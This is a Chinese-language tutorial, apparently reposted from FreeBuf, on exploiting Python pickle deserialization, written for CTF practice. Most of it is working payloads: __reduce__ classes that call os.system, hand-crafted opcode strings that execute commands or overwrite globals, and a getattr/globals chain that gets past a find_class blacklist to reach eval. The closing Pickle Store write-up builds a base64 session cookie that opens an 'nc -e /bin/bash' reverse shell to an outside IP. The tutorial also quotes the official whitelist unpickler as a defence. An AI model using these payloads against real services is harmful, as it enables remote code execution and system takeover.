基础知识

pickle是Python/ target=_blank class=infotextkey>Python下的用于序列化和反序列化的包。

与json相比，pickle以二进制储存。json可以跨语言，pickle只适用于python。pickle能表示python几乎所有的类型(包括自定义类型)，json只能表示一部分内置类型而且不能表示自定义的类型。

pickle实际上可以看作一种独立的语言，通过对opcode的更改编写可以执行python代码、覆盖变量等操作。直接编写的opcode灵活性比使用pickle序列化生成的代码更高，有的代码不能通过pickle序列化得到（pickle解析能力大于pickle生成能力）。

可以被序列化的对象：pickle --- Python 对象序列化 — Python 3.10.2 文档

在重写__reduce__方法的时候，返回的一定是一个元组(callable, ([para1,para2...])[,...])

pickle解析的过程：How pickle works in Python | Artem Golubin (rushter.com)

漏洞利用

方法

• 任意代码执行
• 变量覆盖(覆盖凭证绕过身份验证)

easyDemo

import pickle

class People(object):
    def __init__(self, name):
        self.name = name
    def sayHello(self):
        print("Hello ", self.name)

a = People("RoboTerh")
result = pickle.dumps(a)
print(result)
"""
ccopy_reg
_reconstructor
p0
(c__mAIn__
People
p1
c__builtin__
object
p2
Ntp3
Rp4
(dp5
S'name'
p6
S'RoboTerh'
p7
sb.
"""

反序列化代码实例

import pickle

class People(object):
    def __init__(self, name):
        self.name = name
    def sayHello(self):
        print("Hello ", self.name)

a = People("RoboTerh")
result = pickle.dumps(a)
unser = pickle.loads(result)
unser.sayHello()
"""
('Hello ', 'RoboTerh')
"""

但是如果去掉了People类之后在进行反序列化就会报错

import pickle

class People(object):
    def __init__(self, name):
        self.name = name
    def sayHello(self):
        print("Hello ", self.name)

a = People("RoboTerh")
result = pickle.dumps(a)
del People
unser = pickle.loads(result)
unser.sayHello()
"""
AttributeError: 'module' object has no attribute 'People'
"""

commandExecuteDemo

import pickle
import os

class demo(object):
    def __reduce__(self):
        cmd = """dir"""
        return (os.system, (cmd, )) #必须要返回一个元组
obj = demo()
result = pickle.dumps(obj)
#利用
pickle.loads(result)

variableCoverageDemo

import pickle

key1 = b'123'
key2 = b'456'
class exp(object):
    def __reduce__(self):
        return (exec, ("key1=b'1'nkey2=b'2'", ))

obj = exp()
print(key1, key2)
result = pickle.dumps(obj)
pickle.loads(result)
print(key1, key2)
"""
b'123' b'456'
b'1'   b'2'
"""

构造opcode

常见的opcode

其中TRUE可以用I表示：b'I01n';FALSE可以用I表示：b'I00n'，其他的opcode可以在源代码中查看

全局变量覆盖。

# main.py
import pickle
import secret

opcode = """c__main__
secret
(S'name'
S'1'
db."""
print("before name:", secret.name)
result = pickle.loads(opcode.encode())
print("result:", result)
print("after:", secret.name)

# secret.py
name = 'aaabbbccc'

# 结果
('before name:', 'aaabbbccc')
('result:', <module 'secret' from 'E:my_vscode_pythonwebScriptsecret.py'>)
('after:', '1')

首先，通过c获取全局变量secret，然后建立一个字典，并使用b对secret进行属性设置，

函数执行

与函数执行相关：Rio

• R

b'''cos
system
(S'whoami'
tR.'''

# t 为组合为元组 R 要求必须要是元组

• i

b'''(S'whoami'
IOS
system
.'''

# i 获取全局函数之后寻找栈上一个MARK为元组，以该元组为参数执行函数

• o

b'''(cos
system
S'whoami'
o.'''

# o 寻找上一个MARK作为callable，后面的为参数

实例化对象

• R

import pickle

class Person(object):
    def __init__(self, name, age):
        self.name = name
        self.age = age

data = b"""c__main__
Person
(S'RoboTerh'
S'20'
tR."""

obj = pickle.loads(data)
print(obj.name, obj.age)

# RoboTerh 20

• i

import pickle

class Person(object):
    def __init__(self, name, age):
        self.name = name
        self.age = age

data = b"""(S'RoboTerh'
S'20'
i__main__
Person
."""

obj = pickle.loads(data)
print(obj.name, obj.age)

# RoboTerh 20

• o

import pickle

class Person(object):
    def __init__(self, name, age):
        self.name = name
        self.age = age

data = b"""(c__main__
Person
S'RoboTerh'
S'20'
o."""

obj = pickle.loads(data)
print(obj.name, obj.age)

# RoboTerh 20

pker的使用

下载地址

实践

pickle.Unpickler.find_class()的了解：

官方针对pickle的安全问题的建议是修改find_class()，引入白名单的方式来解决

调用find_class()的情况：

1. 从opcode角度看，当出现c、i、b'x93'时，会调用，所以只要在这三个opcode直接引入模块时没有违反规则即可。
2. 从python代码来看，find_class()只会在解析opcode时调用一次，所以只要绕过opcode执行过程，find_class()就不会再调用，也就是说find_class()只需要过一次，通过之后再产生的函数在黑名单中也不会拦截，所以可以通过__import__绕过一些黑名单。

官方的例子：

import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

使用白名单限制了能够调用的模块：{'range','complex','set','frozenset','slice',}

在高校战役网络安全分享赛中的webtmp

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': # 只允许__main__模块
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

看似只限制使用__main__模块，但是被引入主程序的模块都可以通过__main__调用修改，所以造成了变量覆盖

Code Breaking picklecode

cbuiltins
getattr
p0
(cbuiltins
dict
S'get'
tRp1
cbuiltins
globals
)Rp2
00g1
(g2
S'builtins'
tRp3
0g0
(g3
S'eval'
tR(S'__import__("os").system("whoami")'
tR.

[watevrCTF-2019]Pickle Store

[复现](
https://Github.com/wat3vr/watevrCTF-2019/tree/master/challenges/web/pickle store)

抓包带有一个session，尝试base64解码，联系题目名称pickle。想到通过base64存储反序列化之后的字符串

利用__reduce__构造恶意pickle反序列化字符串

import pickle
import os
import base64 

class Test(object):
    def __reduce__(self):
        return(eval, ("__import__('os').system('nc -e /bin/bash 120.24.207.121 8000')", ))
test = Test()
print(base64.b64encode(pickle.dumps(test)))

from https://www.freebuf.com/vuls/362664.html